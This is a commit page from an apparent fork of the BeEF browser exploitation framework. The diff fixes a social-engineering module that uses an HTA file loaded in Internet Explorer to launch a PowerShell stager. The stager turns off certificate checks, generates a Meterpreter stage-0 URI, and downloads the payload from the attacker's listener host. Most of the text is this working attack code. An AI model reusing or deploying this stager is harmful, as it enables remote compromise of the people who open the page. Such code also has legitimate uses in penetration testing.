Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #1 from ReliaQuest-Labs/hta_patch

Browse Source 
Fixed hta_powershell module so that it can establish a meterpreter session.
This commit is contained in:
Jonathan Echavarria
2015-06-12 15:40:56 -04:00
parent c75b7a633d a826b89480
commit 8f46ed8c26
2 changed files with 31 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files

34
extensions/social_engineering/powershell/powershell_payload
View File

@@ -400,13 +400,39 @@ function Invoke-ps
{
$SSL = 's'
# Accept invalid certificates
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
}
}
# Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
$Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
Write-Verbose "Requesting meterpreter payload from $Request"
# Meterpreter to initiate stage 0.
$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
$x = ""
function sum($v){
return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)
}
function RandomChars{
$f = "";1..3 | foreach-object {$f+= $chars[(Get-Random -maximum $chars.Length)]};
return $f;
}
function RandomArray { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function Generate{
for ($i=0; $i -lt 64; $i++){
$h = RandomChars;$k = $d | RandomArray;
foreach ($l in $k){
$s = $h + $l; if (sum($s)){
return $s}
}
return "9vXU";
}
}
$GeneratedURI = Generate;
$Request = "http$($SSL)://$($Lhost):$($Lport)/$GeneratedURI"
Write-Verbose "Requesting meterpreter payload from $Request"
$Uri = New-Object Uri($Request)
$WebClient = New-Object System.Net.WebClient

2
modules/social_engineering/hta_powershell/command.js
View File

@@ -6,7 +6,7 @@
beef.execute(function () {
var hta_url = '<%= @ps_url %>' + '/hta';
var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';
if (beef.browser.isIE()) {
// application='yes' is IE-only and needed to load the HTA into an IFrame.